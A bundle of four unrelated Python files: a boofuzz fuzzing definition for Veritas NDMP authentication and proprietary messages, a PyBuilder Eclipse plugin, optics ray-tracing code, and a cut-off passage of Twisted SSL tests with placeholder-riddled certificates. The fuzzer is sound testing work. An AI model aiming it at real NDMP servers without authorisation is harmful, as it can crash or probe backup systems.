<filename>boofuzz/request_definitions/ndmp.py
import struct
import time
from boofuzz import *
# NDMP (Network Data Management Protocol) message codes, grouped by the
# protocol interface they belong to. Used as a catalogue of request types
# worth fuzzing.
ndmp_messages = [
    # Connect Interface
    0x900,  # NDMP_CONNECT_OPEN
    0x901,  # NDMP_CONNECT_CLIENT_AUTH
    0x902,  # NDMP_CONNECT_CLOSE
    0x903,  # NDMP_CONNECT_SERVER_AUTH
    # Config Interface
    0x100,  # NDMP_CONFIG_GET_HOST_INFO
    0x102,  # NDMP_CONFIG_GET_CONNECTION_TYPE
    0x103,  # NDMP_CONFIG_GET_AUTH_ATTR
    0x104,  # NDMP_CONFIG_GET_BUTYPE_INFO
    0x105,  # NDMP_CONFIG_GET_FS_INFO
    0x106,  # NDMP_CONFIG_GET_TAPE_INFO
    0x107,  # NDMP_CONFIG_GET_SCSI_INFO
    0x108,  # NDMP_CONFIG_GET_SERVER_INFO
    # SCSI Interface
    0x200,  # NDMP_SCSI_OPEN
    0x201,  # NDMP_SCSI_CLOSE
    0x202,  # NDMP_SCSI_GET_STATE
    0x203,  # NDMP_SCSI_SET_TARGET
    0x204,  # NDMP_SCSI_RESET_DEVICE
    0x205,  # NDMP_SCSI_RESET_BUS
    0x206,  # NDMP_SCSI_EXECUTE_CDB
    # Tape Interface
    0x300,  # NDMP_TAPE_OPEN
    0x301,  # NDMP_TAPE_CLOSE
    0x302,  # NDMP_TAPE_GET_STATE
    0x303,  # NDMP_TAPE_MTIO
    0x304,  # NDMP_TAPE_WRITE
    0x305,  # NDMP_TAPE_READ
    0x307,  # NDMP_TAPE_EXECUTE_CDB
    # Data Interface
    0x400,  # NDMP_DATA_GET_STATE
    0x401,  # NDMP_DATA_START_BACKUP
    0x402,  # NDMP_DATA_START_RECOVER
    0x403,  # NDMP_DATA_ABORT
    0x404,  # NDMP_DATA_GET_ENV
    0x407,  # NDMP_DATA_STOP
    0x409,  # NDMP_DATA_LISTEN
    0x40A,  # NDMP_DATA_CONNECT
    # Notify Interface
    0x501,  # NDMP_NOTIFY_DATA_HALTED
    0x502,  # NDMP_NOTIFY_CONNECTED
    0x503,  # NDMP_NOTIFY_MOVER_HALTED
    0x504,  # NDMP_NOTIFY_MOVER_PAUSED
    0x505,  # NDMP_NOTIFY_DATA_READ
    # Log Interface
    0x602,  # NDMP_LOG_FILES
    0x603,  # NDMP_LOG_MESSAGE
    # File History Interface
    0x703,  # NDMP_FH_ADD_FILE
    0x704,  # NDMP_FH_ADD_DIR
    0x705,  # NDMP_FH_ADD_NODE
    # Mover Interface
    0xA00,  # NDMP_MOVER_GET_STATE
    0xA01,  # NDMP_MOVER_LISTEN
    0xA02,  # NDMP_MOVER_CONTINUE
    0xA03,  # NDMP_MOVER_ABORT
    0xA04,  # NDMP_MOVER_STOP
    0xA05,  # NDMP_MOVER_SET_WINDOW
    0xA06,  # NDMP_MOVER_READ
    0xA07,  # NDMP_MOVER_CLOSE
    0xA08,  # NDMP_MOVER_SET_RECORD_SIZE
    0xA09,  # NDMP_MOVER_CONNECT
    # Reserved for the vendor specific usage (from 0xf000 to 0xffff)
    0xF000,  # NDMP_VENDORS_BASE
    # Reserved for Prototyping (from 0xff00 to 0xffff)
    0xFF00,  # NDMP_RESERVED_BASE
]
s_initialize("Veritas NDMP_CONECT_CLIENT_AUTH")
# The first bit is the "last fragment" flag; we always set it and truncate the
# size field to 3 bytes. 3 bytes of size gives a max 16 MB NDMP message,
# plenty of space.
s_static("\x80")
s_size("request", length=3, endian=">")
if s_block_start("request"):
    if s_block_start("ndmp header"):
        s_static(struct.pack(">L", 1), name="sequence")
        # bug fix: struct.pack(">L", ...) requires an integer, but
        # time.time() returns a float -- this raised struct.error on Python 3
        s_static(struct.pack(">L", int(time.time())), name="timestamp")
        s_static(struct.pack(">L", 0), name="message type")  # request (0)
        s_static(struct.pack(">L", 0x901), name="NDMP_CONECT_CLIENT_AUTH")
        s_static(struct.pack(">L", 1), name="reply sequence")
        s_static(struct.pack(">L", 0), name="error")
        s_block_end("ndmp header")
    s_group("auth types", values=[struct.pack(">L", 190), struct.pack(">L", 5), struct.pack(">L", 4)])
    if s_block_start("body", group="auth types"):
        # do random data.
        s_random(0, min_length=1000, max_length=50000, num_mutations=500)
        # random valid XDR string.
        # s_lego("xdr_string", "pedram")
        s_block_end("body")
    s_block_end("request")
s_initialize("Veritas Proprietary Message Types")
# The first bit is the "last fragment" flag; we always set it and truncate the
# size field to 3 bytes. 3 bytes of size gives a max 16 MB NDMP message,
# plenty of space.
s_static("\x80")
s_size("request", length=3, endian=">")
if s_block_start("request"):
    if s_block_start("ndmp header"):
        s_static(struct.pack(">L", 1), name="sequence")
        # bug fix: struct.pack(">L", ...) requires an integer, but
        # time.time() returns a float -- this raised struct.error on Python 3
        s_static(struct.pack(">L", int(time.time())), name="timestamp")
        s_static(struct.pack(">L", 0), name="message type")  # request (0)
        s_group(
            "prop ops",
            values=[
                struct.pack(">L", 0xF315),  # file list?
                struct.pack(">L", 0xF316),
                struct.pack(">L", 0xF317),
                struct.pack(">L", 0xF200),  #
                struct.pack(">L", 0xF201),
                struct.pack(">L", 0xF202),
                struct.pack(">L", 0xF31B),
                struct.pack(">L", 0xF270),  # send strings like NDMP_PROP_PEER_PROTOCOL_VERSION
                struct.pack(">L", 0xF271),
                struct.pack(">L", 0xF33B),
                struct.pack(">L", 0xF33C),
            ],
        )
        s_static(struct.pack(">L", 1), name="reply sequence")
        s_static(struct.pack(">L", 0), name="error")
        s_block_end("ndmp header")
    if s_block_start("body", group="prop ops"):
        s_random("\x00\x00\x00\x00", min_length=1000, max_length=50000, num_mutations=100)
        s_block_end("body")
    s_block_end("request")
|
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2014 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import string
from pybuilder.core import init, task, description
_DOT_PROJECT_TEMPLATE = string.Template("""<?xml version="1.0" encoding="UTF-8"?>
<!-- This file has been generated by the PyBuilder Pydev Plugin -->
<projectDescription>
<name>${project_name}</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.python.pydev.PyDevBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.python.pydev.pythonNature</nature>
</natures>
</projectDescription>
""")
_DOT_PYDEVPROJECT_PATH_LINE_TEMPLATE = string.Template("\t\t<path>/$project_name/$path</path>\n")
_DOT_PYDEVPROJECT_TEMPLATE = string.Template("""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<?eclipse-pydev version="1.0"?>
<!-- This file has been generated by the PyBuilder Pydev Plugin -->
<pydev_project>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">${interpreter}</pydev_property>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">${version}</pydev_property>
<pydev_pathproperty name="org.python.pydev.PROJECT_SOURCE_PATH">
$paths
</pydev_pathproperty>
</pydev_project>
""")
@init
def init_pydev_plugin(project):
    """Provide defaults for the pydev interpreter name and grammar version."""
    project.set_property_if_unset("pydev_version", "python 2.7")
    project.set_property_if_unset("pydev_interpreter_name", "Default")
@task
@description("Generates eclipse-pydev development files")
def pydev_generate(project, logger):
    """Write Eclipse/Pydev ``.project`` and ``.pydevproject`` files."""
    logger.info("Generating Eclipse/ Pydev project files.")
    # collect whichever source directories the project has configured
    source_properties = ("dir_source_main_python",
                         "dir_source_main_scripts",
                         "dir_source_unittest_python",
                         "dir_source_integrationtest_python")
    paths = []
    for property_name in source_properties:
        add_property_value_if_present(paths, project, property_name)
    # one <path> line per source directory that actually exists on disk
    paths_string = "".join(
        _DOT_PYDEVPROJECT_PATH_LINE_TEMPLATE.substitute(
            {"project_name": project.name, "path": path})
        for path in paths if os.path.exists(path))
    values = {
        "project_name": project.name,
        "interpreter": project.expand("$pydev_interpreter_name"),
        "version": project.expand("$pydev_version"),
        "paths": paths_string
    }
    with open(project.expand_path(".project"), "w") as project_file:
        logger.debug("Writing %s", project_file.name)
        project_file.write(_DOT_PROJECT_TEMPLATE.substitute(values))
    with open(project.expand_path(".pydevproject"), "w") as pydevproject_file:
        logger.debug("Writing %s", pydevproject_file.name)
        pydevproject_file.write(_DOT_PYDEVPROJECT_TEMPLATE.substitute(values))
def add_property_value_if_present(values, project, property_name):
    """Append the value of *property_name* to *values* if the project has it.

    Fix: the accumulator parameter was named ``list``, shadowing the builtin;
    all call sites in this file pass it positionally, so the rename is safe.
    """
    if project.has_property(property_name):
        values.append(project.get_property(property_name))
|
<reponame>duncanesmith/lsclib
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 18 10:33:32 2019
@author: smithd24
"""
# import common functions from default python library
import math # import math functions
import random # import random number functions
import numpy as np # import numpy matrix operations
# import transformation functions
from lsclib import rotations as rm
from lsclib.coordinate_transformations import sph2cart, cart2sph
def xenon_spectrum(spectrum, spectrum_max):
    """From the normalized incident light spectrum on an LSC, probabilistically
    determine an individual wavelength.

    Parameters
    ----------
    spectrum : DataFrame, float
        Normalized incident light spectrum (callable against a probability)
        or an individual fixed wavelength
    spectrum_max : float
        Maximum normalized probability

    Returns
    -------
    wave_len : float
        Initial wavelength of a bundle

    Notes
    -----
    This function should be renamed - it can handle other incident spectra,
    not just xenon. spectrum_max should be automated here, not an input.
    """
    # isinstance (rather than "type(...) is float") also accepts float
    # subclasses such as numpy.float64, which would previously have been
    # treated as a spectrum and called, crashing with TypeError
    if isinstance(spectrum, float):
        return spectrum
    # sample the inverse CDF interpolant at a uniform random probability
    return spectrum(random.uniform(0, spectrum_max))
def pathlength_matrix(wave_len, wave_len_min, wave_len_max, absorption):
    """Sample the distance a bundle travels through the matrix before
    absorption, using Bouger's law.

    Parameters
    ----------
    wave_len : float
        Bundle wavelength
    wave_len_min : float
        Minimum wavelength absorbed by matrix
    wave_len_max : float
        Maximum wavelength absorbed by matrix
    absorption : float, DataFrame
        Constant absorption coefficient, or the normalized absorption
        spectrum of the matrix (callable against wavelength).

    Returns
    -------
    matrix_path : float
        Distance a bundle can travel before it is absorbed.
    """
    if type(absorption) is float:
        abs_coeff = absorption
    else:
        abs_coeff = 0
        if wave_len < wave_len_min or wave_len > wave_len_max:
            # outside the absorption band: treat the matrix as opaque
            abs_coeff = 10000
        if wave_len_min <= wave_len <= wave_len_max:
            abs_coeff = absorption(wave_len)
    # Bouger's law with a uniformly sampled transmittance
    return (-1 / abs_coeff) * math.log(random.uniform(0, 1))
def surface_absorption(wave_len, wave_len_min, wave_len_max, abs_surface):
    """Return the probability that a bundle is absorbed at a boundary,
    as a function of wavelength.

    Parameters
    ----------
    wave_len : float
        Bundle wavelength
    wave_len_min : float
        Minimum wavelength absorbed by matrix
    wave_len_max : float
        Maximum wavelength absorbed by matrix
    abs_surface : DataFrame
        Probability of absorption of a surface as a function of wavelength
        (callable against wavelength)

    Returns
    -------
    probability : float
        Probability that a bundle is absorbed; 0 outside the absorbing band.

    Notes
    -----
    surface_absorption should be renamed to boundary_absorption
    """
    if wave_len_min <= wave_len <= wave_len_max:
        return abs_surface(wave_len)
    return 0
def refracted_vect(n_i, n_f, vect):
    """Compute the refracted trajectory at an interface via Snell's law.

    Parameters
    ----------
    n_i : float
        Index of refraction of the current medium
    n_f : float
        Index of refraction of the medium a bundle is attempting to enter
    vect : NumPy array
        Current bundle trajectory in local coordinates

    Returns
    -------
    refr_vect : NumPy array, string
        Refracted vector - bundle trajectory after refraction. The string
        "no refraction" is returned on total internal reflection.
    """
    theta, phi = cart2sph(vect)
    # Snell's law: sin(theta_refracted) = sin(theta) * n_i / n_f
    sin_refracted = math.sin(theta) * n_i / n_f
    # beyond the critical angle the sine exceeds 1 -> total internal reflection
    if n_f < n_i and sin_refracted > 1:
        return "no refraction"
    refr_angle = math.asin(sin_refracted)
    # realign refr_angle within one quadrant
    if theta > math.pi / 2:
        refr_angle = math.pi - refr_angle
    return sph2cart(refr_angle, phi)
def reflectivity(vect, refracted_vect):
    """Calculate reflectivity at an interface using Fresnel's equations. Light
    is assumed to be unpolarized.
    Parameters
    ----------
    vect : NumPy array
        Current bundle trajectory in local coordinates
    refr_vect : NumPy array, string
        Refracted vector - bundle trajectory after refraction. If refraction
        was impossible, this is a string.
    Returns
    -------
    rho : float
        Reflectivity at an interface calculated using Fresnel's equations
    Notes
    -----
    """
    # a string refracted vector signals total internal reflection upstream
    if isinstance(refracted_vect, str) is False:
        [xi, phi] = cart2sph(refracted_vect)
        [theta, phi] = cart2sph(vect)
        # apply Fresnel's equations for reflectivity to determine reflectivity
        # (mean of the parallel/tan and perpendicular/sin polarization terms)
        # NOTE(review): at exact normal incidence theta == xi == 0, so both
        # quotients are 0/0 (ZeroDivisionError) -- confirm callers never hit
        # a perfectly normal ray.
        rho = 0.5 * ((math.tan(theta - xi))**2 / (math.tan(theta + xi))**2 +
                     (math.sin(theta - xi))**2/(math.sin(theta + xi))**2)
    else:
        rho = 1  # critical angle was achieved ensuring reflection
    return rho
def refraction_or_reflection(rho, vect, tilt, refracted_vect, indexmatch,
                             n, surface_type = 'specular'):
    """Determine if a bundle is refracted or reflected at an interface.
    Parameters
    ----------
    rho : float
        Reflectivity at an interface calculated using Fresnel's equations
    vect : NumPy array
        Current bundle trajectory in local coordinates
    tilt : float
        Boundary angle relative to the xy plane
    refracted_vect : NumPy array, string
        Refracted vector - bundle trajectory after refraction. If refraction
        was impossible, this is a string.
    indexmatch : int
        If indexmatch is 1, bundle remains in the same volume or is lost
        If indexmatch is 0, bundle has the opportunity to move to an
        adjacent volume.
    n : NumPy array
        Normal vector of a boundary, faces inward towards center of the volume
    surface_type : string, optional
        Indicates the behavior of reflected bundles, options are:
            (1) Specular
            (2) Diffuse
    Returns
    -------
    theta : float
        Polar incidence angle (classically defined as just the incidence
        angle) in global coordinates. This is a spherical coordinate.
    phi : float
        Azimuthal incidence angle in global coordinates. This is a
        spherical coordinate.
    bundle_reflect_stay : int
        Bundle is reflected but remains within the LSC (1) otherwise (0)
    bundle_reflect_lost : int
        Bundle is reflected and is lost (1) otherwise (0)
    bundle_refract_lost : int
        Bundle is refracted out of the LSC (1) otherwise (0)
    Notes
    -----
    There is an excess rotation to produce "ray_vector", this could be included
    within bundle_reflection and/or bundle_reflection and processed there
    instead.
    """
    bundle_reflect_stay = 0
    bundle_reflect_lost = 0
    bundle_refract_lost = 0
    # ray_vector : NumPy array
    #     reflected/refracted vector in local coordinates
    # ray_normal_angle : NumPy array
    #     Angle between surface normal and reflected/refracted vector
    # Monte Carlo decision: reflect with probability rho, otherwise refract
    if random.uniform(0, 1) < rho:
        [theta, phi] = bundle_reflection(surface_type, vect, tilt, n)
        ray_vector = sph2cart(theta, phi)
        ray_vector = rm.rot(tilt, ray_vector, n)  # rotate into local coords
        ray_normal_angle = tilt_angle(ray_vector)
        # normalize the angle into [0, 2*pi)
        if ray_normal_angle < 0:
            ray_normal_angle = 2*math.pi + ray_normal_angle
        # if outgoing angle will cause bundle to move in opposite direction of
        # normal, otherwise bundle stays in LSC
        if ((3*math.pi/2) > ray_normal_angle > (math.pi/2)):
            bundle_reflect_lost = 1
        else:
            bundle_reflect_stay = 1
    else:
        [theta, phi] = bundle_refraction(surface_type, refracted_vect, tilt, n)
        ray_vector = sph2cart(theta, phi)
        ray_vector = rm.rot(tilt, ray_vector, n)  # rotate into local coords
        ray_normal_angle = tilt_angle(ray_vector)
        # normalize the angle into [0, 2*pi)
        if ray_normal_angle < 0:
            ray_normal_angle = 2 * math.pi + ray_normal_angle
        # if outgoing angle will cause bundle to move in opposite direction of
        # the normal and bundle will not enter a new volume then the bundle is
        # lost. Otherwise, the bundle stays in the LSC
        if (((3 * math.pi / 2) > ray_normal_angle > (math.pi / 2))
                and (indexmatch == 1)):
            bundle_refract_lost = 1
    return [theta, phi, bundle_reflect_stay,
            bundle_reflect_lost, bundle_refract_lost]
def bundle_reflection(surface_type, vect, tilt, n):
    """Determine bundle trajectory upon reflection. Currently, bundles can be
    reflected specularly or diffusely.
    Parameters
    ----------
    vect : NumPy array
        Current bundle trajectory in local coordinates
    tilt : float
        Boundary angle relative to the xy plane
    n : NumPy array
        Normal vector of a boundary, faces inward towards center of the volume
    surface_type : string, optional
        Indicates the behavior of reflected bundles, options are:
            (1) Specular
            (2) Diffuse
    Returns
    -------
    theta : float
        Polar incidence angle (classically defined as just the incidence
        angle) in global coordinates. This is a spherical coordinate.
    phi : float
        Azimuthal incidence angle in global coordinates. This is a
        spherical coordinate.
    Notes
    -----
    NOTE(review): an unrecognized surface_type only prints a message and
    falls through, implicitly returning None -- callers that unpack the
    result will then fail. Consider raising ValueError instead.
    """
    if surface_type == 'specular':
        # mirror reflection: reverse the ray and rotate 180 deg about normal
        vect = np.array(vect) * -1  # flip direction of vector
        vect = rm.z(math.pi, vect)  # rotate 180 around normal
        vect = rm.rot(-tilt, vect, n)  # rotate back to global coords
        [theta, phi] = cart2sph(vect)
        return [theta, phi]
    elif surface_type == 'diffuse':
        # cosine-weighted hemisphere sampling for a diffuse bounce
        theta_rand = math.asin(math.sqrt(random.uniform(0, 1)))
        phi_rand = 2 * math.pi * random.uniform(0, 1)
        vect = sph2cart(theta_rand, phi_rand)
        vect = rm.rot(-tilt, vect, n)  # rotate back to global coords
        [theta, phi] = cart2sph(vect)
        return[theta, phi]
    else:
        print("The type of surface you have selected is not available")
def bundle_refraction(surface_type, refracted_vect, tilt, n):
    """Determine bundle trajectory upon refraction. Currently, bundles can be
    refracted specularly or diffusely.
    Parameters
    ----------
    refracted_vect : NumPy array
        Refracted bundle trajectory in local coordinates
    tilt : float
        Boundary angle relative to the xy plane
    n : NumPy array
        Normal vector of a boundary, faces inward towards center of the volume
    surface_type : string, optional
        Indicates the behavior of refracted bundles, options are:
            (1) Specular
            (2) Diffuse
    Returns
    -------
    theta : float
        Polar incidence angle (classically defined as just the incidence
        angle) in global coordinates. This is a spherical coordinate.
    phi : float
        Azimuthal incidence angle in global coordinates. This is a
        spherical coordinate.
    Notes
    -----
    NOTE(review): an unrecognized surface_type only prints a message and
    falls through, implicitly returning None -- callers that unpack the
    result will then fail. Consider raising ValueError instead.
    """
    if surface_type == 'specular':
        vect = rm.rot(-tilt, refracted_vect, n)  # rotate back to global coords
        [theta, phi] = cart2sph(vect)
        return [theta, phi]
    elif surface_type == 'diffuse':
        # cosine-weighted hemisphere sampling for a diffuse transmission
        theta_rand = math.asin(math.sqrt(random.uniform(0, 1)))
        phi_rand = 2 * math.pi * random.uniform(0, 1)
        vect = sph2cart(theta_rand, phi_rand)
        vect = rm.rot(-tilt, vect, n)  # rotate back to global coords
        [theta, phi] = cart2sph(vect)
        return[theta, phi]
    else:
        print("The type of surface you have selected is not available")
def surface_efficiency(efficiency):
    """Decide probabilistically whether a bundle is absorbed at a surface.

    Parameters
    ----------
    efficiency : float
        Efficiency of a surface (a perfect mirror has an efficiency of 0, a
        perfect absorber has an efficiency of 1)

    Returns
    -------
    reset : int
        1 if the bundle is absorbed, 0 if it continues.

    Notes
    -----
    This should be combined with surface_absorption.
    """
    return 1 if random.uniform(0, 1) <= efficiency else 0
def photon_generation(wave_len, energy):
    """Return the number of photons carried by a bundle.

    Parameters
    ----------
    wave_len : float
        Wavelength associated with a particular bundle, in nanometers
    energy : float
        Energy in a bundle

    Returns
    -------
    nphoton : float
        Number of photons in a bundle; 0 above the 1107 nm cutoff.
    """
    planck = 6.626e-34      # [joule*s] Planck's constant
    light_speed = 2.998e8   # [m/s] speed of light
    photon_energy = (planck * light_speed) / (wave_len * 1e-9)
    if wave_len <= 1107:
        return energy / photon_energy
    return 0
def refracted_vect_flip(n, bdy_center, n_max, p_o, p_i, vect):
    """Determine whether a bundle is leaving or entering the LSC and return
    the corresponding refracted vector.

    Parameters
    ----------
    n : NumPy array
        Normal vector of a boundary, faces inward towards center of the volume
    bdy_center : NumPy array
        Center point of a boundary in 3D
    n_max : float
        Index of refraction of matrix
    p_o : NumPy array
        Confirmed bundle position inside the LSC.
    p_i : NumPy array
        Potential bundle position (the candidate boundary intersection).
    vect : NumPy array
        Current bundle trajectory in global coordinates

    Returns
    -------
    NumPy array or string
        Refracted vector from :func:`refracted_vect`.

    Notes
    -----
    Assumes the exterior medium is air (index 1.0).
    """
    # a point far outside the volume along the (inward-facing) normal
    far_point = bdy_center + np.array(100000 * n)
    dist_far_to_origin = np.linalg.norm(far_point - np.array(p_o))
    dist_far_to_intersect = np.linalg.norm(far_point - np.array(p_i))
    # if the current position is closer to the far point than the candidate
    # intersection is, the bundle is moving away from it -> leaving the volume
    if dist_far_to_origin < dist_far_to_intersect:
        return refracted_vect(n_max, 1.0, vect)   # matrix -> air
    return refracted_vect(1.0, n_max, vect)       # air -> matrix
def incidence_angle(n, n_o):
    """Return the signed polar angle between two boundary normals.

    Parameters
    ----------
    n : NumPy array
        normal vector of second boundary
    n_o : NumPy array
        normal vector of first boundary or the xy plane (z-axis)

    Returns
    -------
    theta_i : float
        Polar incidence angle between the two normals, sign-corrected by
        the cross product direction.

    Notes
    -----
    Boundaries must either run parallel to the x-axis or have their surface
    normal parallel to the x-axis for the sign convention to hold.
    """
    n = np.array(n)
    n_o = np.array(n_o)
    dot = np.dot(n, n_o)
    # guard acos against round-off just outside [-1, 1]
    if math.isclose(dot, -1, abs_tol=1e-7):
        theta_i = math.pi
    elif math.isclose(dot, 1, abs_tol=1e-7):
        theta_i = 0
    else:
        theta_i = math.acos(dot)
    # the cross product fixes the sign; which component to inspect depends on
    # whether the reference normal runs parallel to the x-axis
    cross = np.cross(n, n_o)
    sign_component = 1 if list(abs(n_o)) == [1, 0, 0] else 0
    if cross[sign_component] < 0:
        theta_i = -theta_i
    return theta_i
def tilt_angle(n):
    """Return the signed polar angle between a boundary normal and the
    global z-axis.

    Parameters
    ----------
    n : NumPy array
        Normal vector of a boundary, faces inward towards center of the volume

    Returns
    -------
    theta_i : float
        Polar incidence angle between the boundary normal and global z-axis,
        sign-corrected by the cross product direction.

    Notes
    -----
    This should be consolidated with the incidence_angle function; they do
    essentially the same thing. Boundaries must either run parallel to the
    x-axis or have their surface normal parallel to the x-axis.
    """
    n = np.array(n)
    z_axis = np.array([0, 0, 1])
    dot = np.dot(n, z_axis)  # cosine of the angle between the two normals
    # guard acos against round-off just outside [-1, 1]
    if math.isclose(dot, -1, abs_tol=1e-7):
        theta_i = math.pi
    elif math.isclose(dot, 1, abs_tol=1e-7):
        theta_i = 0
    else:
        theta_i = math.acos(dot)
    # the cross product fixes the sign; which component to inspect depends on
    # whether the boundary normal runs parallel to the x-axis
    cross = np.cross(n, z_axis)
    sign_component = 1 if list(abs(n)) == [1, 0, 0] else 0
    if cross[sign_component] < 0:
        theta_i = -theta_i
    return theta_i
def find_bdy_center(polygon):
    """Return the centroid of a boundary polygon.

    Parameters
    ----------
    polygon : NumPy array
        Set of at least three vertices in the same plane

    Returns
    -------
    NumPy array
        Center point of the boundary (mean of its vertices).
    """
    vertices = np.array(polygon)
    return sum(vertices) / len(vertices)
def find_normal_vector(polygon, bdy_center, vol_center):
    """Return the inward-facing unit normal of a boundary plane.

    Given a polygon (at least three coplanar points) and the center of the
    enclosing volume, reports the unit normal of the plane oriented towards
    the volume center. The inward orientation later lets the ray tracer tell
    whether a bundle moves with or against a boundary.

    Parameters
    ----------
    polygon : list, NumPy array
        Set of at least three vertices in the same plane
    bdy_center : NumPy array
        Center point of a boundary
    vol_center : list, NumPy array
        Center point of a volume

    Returns
    -------
    unit_vector : NumPy array
        unit normal vector of a boundary facing inward
    """
    polygon = np.array(polygon)
    vol_center = np.array(vol_center)
    # two in-plane edge vectors sharing vertex 0
    v1 = polygon[2] - polygon[0]
    v2 = polygon[1] - polygon[0]
    # their cross product is normal to the plane
    # (fix: removed dead unpacking "a, b, c = cp" -- the components were
    # never used)
    cp = np.cross(v1, v2)
    unit_vector = cp / np.linalg.norm(cp)
    # check orientation: if stepping from the boundary center along the
    # normal moves AWAY from the volume center, the normal points outward
    dist_center = np.linalg.norm(bdy_center - vol_center)
    dist_with_normal = np.linalg.norm(bdy_center + unit_vector
                                      * dist_center - vol_center)
    if(dist_center < dist_with_normal):
        unit_vector *= -1
    return unit_vector
def find_vol_center(bdy_points):
    """Return the center point of a volume.

    Parameters
    ----------
    bdy_points : list
        The coordinates of each vertex of the volume, grouped per boundary.

    Returns
    -------
    numpy.ndarray
        Center point of the volume (mean of the distinct vertices).
    """
    # Flatten every boundary's vertex list into one sequence of points.
    all_points = [vertex
                  for boundary in bdy_points
                  for vertex in np.array(boundary)]
    # Shared vertices appear in several boundaries; keep each only once so
    # the mean is not biased towards corners with more incident faces.
    unique_points = np.unique(all_points, axis=0)
    return sum(unique_points) / len(unique_points)
def find_vol_dimensions(bdy_points):
    """Find the axis-aligned bounding-box side lengths of a volume.

    (The previous docstring said "Find center point of a volume" -- a
    copy-paste error; this function returns side lengths, not a center.)

    Parameters
    ----------
    bdy_points : list
        The coordinates of each vertex of the volume, grouped per boundary.

    Returns
    -------
    Lx : float
        Length of the LSC in the x-direction.
    Ly : float
        Length of the LSC in the y-direction.
    Lz : float
        Length of the LSC in the z-direction.
    """
    # Flatten the per-boundary vertex lists into one (N, 3) coordinate array.
    vertices = [vertex for bdy in bdy_points for vertex in bdy]
    coords = np.asarray(vertices, dtype=float)
    # Peak-to-peak (max - min) along each axis gives the side lengths;
    # replaces the previous per-axis copy loops.
    Lx, Ly, Lz = np.ptp(coords, axis=0)
    return Lx, Ly, Lz
|
<reponame>84KaliPleXon3/sslstrip-hsts-openwrt<gh_stars>1-10
# Copyright 2005 Divmod, Inc. See LICENSE file for details
import itertools
from OpenSSL import SSL
from OpenSSL.crypto import PKey, X509, X509Req
from OpenSSL.crypto import TYPE_RSA
from twisted.trial import unittest
from twisted.internet import protocol, defer, reactor
from twisted.python import log
from twisted.python.reflect import objgrep, isSame
from twisted.internet import _sslverify as sslverify
from twisted.internet.error import CertificateError
# A couple of static PEM-format certificates to be used by various tests.
# Static, pre-generated PEM certificates used as fixtures by the tests below.
# NOTE(review): the "<KEY>" fragments look like redacted base64 material --
# these certificates will not parse as-is; restore the full PEM bodies
# before running the inspect/serial-number tests.
A_HOST_CERTIFICATE_PEM = """
-----BEGIN CERTIFICATE-----
MI<KEY>
<KEY>
I<KEY>
Ym9keUB0d2lzdGVkbWF0cml4LmNvbTERMA8GA1UECxMIU2VjdXJpdHkwgZ8wDQYJ
KoZIhvcNAQEBBQADgY0AMIGJAoGBAMzH8CDF/U91y/bdbdbJKnLgnyvQ9Ig9ZNZp
8hpsu4huil60zF03+Lexg2l1FIfURScjBuaJMR6HiMYTMjhzLuByRZ17KW4wYkGi
KXstz03VIKy4Tjc+v4aXFI4XdRw10gGMGQlGGscXF/RSoN84VoDKBfOMWdXeConJ
VyC4w3iJAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAviMT4lBoxOgQy32LIgZ4lVCj
JNOiZYg8GMQ6y0ugp86X80UjOvkGtNf/R7YgED/giKRN/q/XJiLJDEhzknkocwmO
S+4b2XpiaZYxRyKWwL221O7CGmtWYyZl2+92YYmmCiNzWQPfP6BOMlfax0AGLHls
fXzCWdG0O/3Lk2SRM0I=
-----END CERTIFICATE-----
"""
A_PEER_CERTIFICATE_PEM = """
-----BEGIN CERTIFICATE-----
MIIC3jCCAkcCAjA6MA0GCSqGSIb3DQEBBAUAMIG2MQswCQYDVQQGEwJVUzEiMCAG
A<KEY>
MR<KEY>
dXNldHRzMSkwJwYJKoZIhvcNAQkBFhpzb21lYm9keUB0d2lzdGVkbWF0cml4LmNv
bTERMA8GA<KEY>
-----END CERTIFICATE-----
"""
# Monotonically increasing serial-number source for generated certificates.
# Python 2 idiom: binds the iterator's .next method; under Python 3 this
# would be written with functools/partial(next, itertools.count()).
counter = itertools.count().next
def makeCertificate(**kw):
    """Create a self-signed test certificate.

    Keyword arguments (e.g. O=..., CN=...) are set as attributes on both
    the issuer and the subject name, so the certificate is its own issuer.
    Returns a (keypair, certificate) tuple.  MD5 signing and 1024-bit RSA
    are weak by modern standards but adequate for these unit-test fixtures.
    """
    keypair = PKey()
    keypair.generate_key(TYPE_RSA, 1024)
    certificate = X509()
    certificate.gmtime_adj_notBefore(0)
    certificate.gmtime_adj_notAfter(60 * 60 * 24 * 365) # One year
    # Same attributes on issuer and subject: self-signed.
    for xname in certificate.get_issuer(), certificate.get_subject():
        for (k, v) in kw.items():
            setattr(xname, k, v)
    # Module-level counter() keeps serial numbers unique across fixtures.
    certificate.set_serial_number(counter())
    certificate.set_pubkey(keypair)
    certificate.sign(keypair, "md5")
    return keypair, certificate
def otherMakeCertificate(**kw):
    """Create a self-signed test certificate via an X509Req signing request.

    Same result shape as makeCertificate() -- a (keypair, certificate)
    tuple -- but exercises the request-based construction path: attributes
    are set on the request's subject, then copied onto the certificate as
    both issuer and subject.
    """
    keypair = PKey()
    keypair.generate_key(TYPE_RSA, 1024)
    req = X509Req()
    subj = req.get_subject()
    for (k, v) in kw.items():
        setattr(subj, k, v)
    req.set_pubkey(keypair)
    req.sign(keypair, "md5")
    cert = X509()
    cert.set_serial_number(counter())
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(60 * 60 * 24 * 365) # One year
    # Issuer == subject: self-signed, mirroring makeCertificate().
    cert.set_issuer(req.get_subject())
    cert.set_subject(req.get_subject())
    cert.set_pubkey(req.get_pubkey())
